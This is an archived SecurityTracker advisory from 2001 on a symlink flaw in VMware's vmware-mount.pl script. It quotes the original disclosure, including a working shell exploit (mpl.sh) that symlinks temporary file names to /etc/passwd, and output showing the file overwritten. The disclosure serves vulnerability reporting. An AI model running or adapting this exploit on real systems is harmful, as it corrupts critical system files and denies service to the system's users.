SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   VMware Vendors:   VMware
VMware Allows Local Users to Overwrite Any File on the System
SecurityTracker Alert ID:  1001368
SecurityTracker URL:  http://securitytracker.com/id/1001368
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 19 2001
Impact:   Modification of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   A vulnerability has been reported in a script that ships with the VMware Windows environment package for Linux.

There is reported to be a symlink vulnerability in the vmware-mount.pl script which is part of VMware. A temporary file named vmware-mount.pl.PID (where PID is the current pid of the command) will be created in an insecure manner while mounting virtual disk drives using vmware-mount.pl. This reportedly allows a local user to overwrite any local file, as a VMware virtual partition is usually mounted by root.

A demonstration exploit example is provided in the source message.

Impact:   A local user could cause any file to be overwritten.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vmware.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(A User Provides Recommendations) Re: VMware Allows Local Users to Overwrite Any File on the System
A user provides some mitigating recommendations.



 Source Message Contents

Subject:  VMware symlink problems


1. Problem description
----------------------

There is symlink vulnerability in the vmware-mount.pl script which comes
with lates VMware.


2. Details
----------

While mounting virtual disk drives using the vmware-mount.pl script, a
temporary file named vmware-mount.pl.PID where PID is the current pid of
the command will be created in an insecure manner. This allows an
attacker to overwrite any local file, if root mounts a VMware's virtual
partition (mounting is usually done as root).

Example:

paul@ps:/tmp > id
uid=500(paul) gid=100(users) Gruppen=100(users),90(firewall)
paul@ps:/tmp > ./mpl.sh

VMware local /etc/passwd DoS
By Ihq.

     linking /etc/passwd to /tmp
[+] please wait for root to run vmware-mount.pl


after running vmware-mount.pl:

paul@ps:/tmp > id
uid=500 gid=100(users) Gruppen=100(users),90(firewall)

Obviously the passwd file has been overwritten:

paul@ps:/tmp > cat /etc/passwd

Nr      Start       Size Type Id Sytem
-- ---------- ---------- ---- -- ------------------------
 1         63    2096577 BIOS  C Win95 FAT32 (LBA)


I'm not sure, if it is exploitable for priviledge elevation.


3. Impact
---------

Local file corruption.




---------------------- mpl.sh ----------------------

#/bin/bash

declare -i n
declare -i mx

n=2
mx=32767

echo
echo "VMware local /etc/passwd DoS"
echo "By Ihq."
echo

echo "     linking /etc/passwd to /tmp"

while test $n -lt $mx ; do
        ln -s /etc/passwd /tmp/vmware-mount.pl.$n
        n=$(($n + 1))
done

echo "[+] please wait for root to run vmware-mount.pl"
echo

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC